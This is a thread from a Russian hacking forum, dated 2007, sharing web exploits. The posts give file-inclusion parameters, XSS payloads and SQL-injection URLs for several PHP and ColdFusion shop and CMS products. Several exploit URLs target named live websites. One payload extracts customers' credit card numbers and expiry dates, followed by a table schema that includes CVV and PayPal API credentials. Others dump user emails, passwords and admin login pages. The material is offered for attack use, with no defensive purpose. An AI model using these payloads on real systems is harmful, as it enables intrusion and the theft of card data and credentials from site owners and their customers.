Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

03.07.2007, 23:59
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме: 6023777
Репутация:
2642
|
|
немного PHP-inj.
PHP::HTML 0.6.4 (PHP-inj)
phphtml.php?htmlclass_path=[url]
Media Gallery 1.4.8a (PHP-inj)
mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=[file]
YAAP 1.5 (PHP-inj)
includes/common.php?root_path=[file]
NagiosQL 2.00-P00 (PHP-inj)
functions/prepend_adm.php?SETS[path][physical]=[file]
|
|
|

12.07.2007, 13:16
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
AMGuests0.3.0
1) Локальный инклуд файлов.
Требуется:
register_globals = On
magic_quotes = Off
Код:
http://site.ru/gb/signin.php?sent=1&AMG_serverpath=FILE%00
2) Пассивные XSS.
Требуется:
register_globals = On
Код:
http://site.ru/gb/signin.php?AMG_signin_name="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_signin_location="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_signin_icq="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_signin_email="><script>alert(1);</script>
http://site.ru/gb/signin.php?AMG_currentlanguage[signin_form_userimage]="><script>alert(1);</script>
|
|
|

12.07.2007, 13:50
|
|
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
Провел на форуме: 2009677
Репутация:
472
|
|
Virtual War v1.5.0 or low
XSS и SQL-INJ
http://[host]/vwar/war.php?s=[SQL]
http://[host]/vwar/war.php?page=[SQL]or[XSS]
http://[host]/vwar/war.php?showgame=[SQL]
http://[host]/vwar/war.php?sortby=[SQL]
http://[host]/vwar/war.php?sortorder=[SQL]
http://[host]/vwar/calendar.php?year=[XSS]
http://[host]/vwar/calendar.php?month=[SQL] & [XSS]
зы: Powered by: Virtual War v1.5.0
|
|
|

19.07.2007, 18:15
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме: 2693408
Репутация:
861
|
|
SQL-inj в QuickEstore
Существует возможность провести sql-инъекцию из-за недостаточной обработки входных данных в параметре CFTOKEN в скрипте insertorder.cfm.
Пример:
http://www.appointmentsatfive.com/insertorder.cfm?CFID=6060&CFTOKEN=88477579+union+s elect+1,2,3,ccnum,ccname,6,7,8,9,10,11,12,13,cctyp e,ccexpires,16,17,18,19+from+customers/*
Кол-во полей везде разное, но в основном от 15 до 19.
Есть и cvv, но он в таблице PARAMS и есть почему-то не везде, но можно вывести его и через последние заказы.
Вот всё остальное (после TABLE таблица, ниже колонки в ней):
TABLE [Attributes]
[AttributeNum]
[Attribute]
[AttValues]
TABLE [Categories]
[CategoryID]
[Category]
[CatPic]
TABLE [Customers]
[CustID]
[CustFName]
[CustLName]
[CustPhone]
[CustEMail]
[CustAddress1]
[CustAddress2]
[CustCity]
[CustState]
[CustZip]
[CustCountry]
[LastOrderID]
[LastOrderDate]
[LastOrderAmt]
[CCName]
[CCType]
[CCNum]
[CCExpires]
[CustPWord]
TABLE [OrderHist]
[OrderNum]
[CustID]
[ItemID]
[SKU]
[Quantity]
[ItemTotal]
[TotItemWeight]
[Att1]
[Att2]
[Status]
TABLE [Orders]
[OrderID]
[ItemID]
[Quantity]
[ItemTotal]
[TotItemWeight]
[Expires]
[Att1]
[Att2]
TABLE [OrdHistDetail]
[OrderNum]
[CustID]
[GrandTotal]
[Shipping]
[SalesTax]
[OrderDate]
[CustEMail]
[Notes]
[ShipDate]
[ShipMethod]
[ShipName]
[ShipAddress]
[ShipCity]
[ShipState]
[ShipZip]
[upsize_ts]
[AddressStatus]
TABLE [Params]
[storename]
[template]
[password]
[processor]
[partner]
[vendor]
[loginid]
[paypassword]
[certpath]
[type]
[ccards]
[testmode]
[inv_description]
[store_path]
[store_url]
[secure_url]
[order_path]
[order_url]
[orderaction]
[notifyemail]
[db]
[graphic]
[shipmethod]
[selfservice]
[offerpaypal]
[paypalonly]
[ppec]
[cffileenabled]
[csistorename]
[storefax]
[storeaddy]
[storecity]
[storestate]
[storezip]
[avs]
[cvv]
[PPEC_API_UserName]
[PPEC_API_Password]
[PPEC_API_Signature]
TABLE [ProdPics]
[ItemID]
[ItemPic]
[Thumbnail]
TABLE [Products]
[ItemID]
[SKU]
[ItemName]
[CategoryID]
[SubCatID]
[Description]
[Price]
[MSRP]
[DiscAmt]
[DiscIsPct]
[DiscTrigger]
[Weight]
[A1]
[A1Vals]
[A2]
[A2Vals]
[Units]
[Layout]
[Qty_In_Stock]
[Safety_Stock]
[Taxable]
[Shipable]
[Show_Inventory]
[New] [bit]
TABLE [SalesTax]
[State]
[Rate]
TABLE [ShipOptions]
[OptID]
[Option_]
[OptRate]
TABLE [Shipping]
[shiplimit]
[shipfee]
TABLE [SubCats]
[SubCatID]
[SubCat]
[TopCatID]
TABLE [States]
[State]
[Abbreviation]
TABLE [Categories]
[PK_Categories]
[CategoryID]
TABLE [Customers]
[PK_Customers]
[CustID]
TABLE [ProdPics]
[PK_ProdPics]
[ItemID]
TABLE [Products]
[DF_Products_Taxable]
[Taxable]
[DF_Products_Shipable]
[Shipable],
[PK_Products]
[ItemID]
На счет версии не знаю, но в гугле на запрос
каждая вторая уязвима.
P.S.: Вроде ничё не забыл 
Последний раз редактировалось n0ne; 19.07.2007 в 18:29..
|
|
|

07.08.2007, 21:34
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме: 2693408
Репутация:
861
|
|
Раскрытие пути в ARTEShok CMS:
http://www.paratech.ru/main.phtml?cid[]=5010072
^^^ их оф.сайт ^^^
|
|
|

28.08.2007, 12:37
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме: 1212427
Репутация:
187
|
|
SQL-инъекция в CMS Koobi
CMS Koobi v4.2 v5.8 v6.1 со страницей скачки файлов
возможно другие версии(тестировал только на этих)
http://site/index.php?area=1&p=downloads&categ=-1+union+select+1,concat(email,0x3a,pass),3+from+table_name/*
Наиболее вероятные зачения table_name:
Код:
koobi4_user
kpro_user
kpro5_user
kpro6_user
для авторизации нужны email и пароль
Пароль - дважды хэшированный md5: md5(md5($pass))
|
|
|

15.09.2007, 11:03
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Open Guestbook 0.5
Скачать можно здесь:
http://sourceforge.net/project/showf...group_id=82463
1) Пассивная XSS
Код:
http://localhost/header.php?title=</title><script>alert(123);</script>
2) SQL инъекция/активная XSS
В скрипте process.php из-за отсутсвия фильтрации можно провести инъекцию в запросе INSERT...
При добавление сообщения в поле Message вводим:
Код:
','','','', '', '', '', '', '', '><script>alert(111);</script>', '', '', '')/*
В результате получим выполнение нашего скрипта при просмотре сообщений, т.е. получаем активную xss.
Последний раз редактировалось Grey; 15.09.2007 в 11:06..
|
|
|

03.11.2007, 04:02
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме: 2063900
Репутация:
138
|
|
artCifra CMS v4.5
Уязвимость в cookie. Имя куки artcifraSES. Возможность проведения SQL инъекции.
Пример:
Изменяем содержимое куки на:
Код:
')+union+select+column1,column2+from+some_table
|
|
|

15.11.2007, 04:39
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
CONTENTdm
Пассивные XSS:
1) в скрипте results.php уязвимы переменная CISOBOX1, CISOBOX2 и т.д.
кстати найдена мной 05.07.2007
а в багтраках появилась только 06.08.2007, так что если и баян, то свой, так сказать для полноты сюда запостил
2) во многих скриптах в переменной CISOROOT
примеры:
Код:
http://contentdm.nitle.org/cdm4/item_viewer.php?CISOROOT=%3Cscript%3Ealert(document.cookie);%3C/script%3E
Код:
http://mdc.cbuc.cat/cdm4/document.php?CISOROOT=%3Cscript%3Ealert(document.cookie);%3C/script%3E
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 15.11.2007 в 04:42..
|
|
|

19.11.2007, 19:03
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме: 1777536
Репутация:
932
|
|
A-Shop Версии: 4.4.1(возможно и более ранние) - 4.7.х(last)
SQL-инъекция с доступом в user и с незашифренными пасами.
Уязвимость в catalogue.php , переменная cat, фильтрации никакой нет. Колличество столбцов 33,32 или 2.
Пример:
Код:
http://www.the123d.com/shop/catalogue.php?cat=-21+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+user/*
Админка:
http://www.the123d.com/shop/admin/login.php
Отправил на video@antichat.ru должны скоро выложить.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|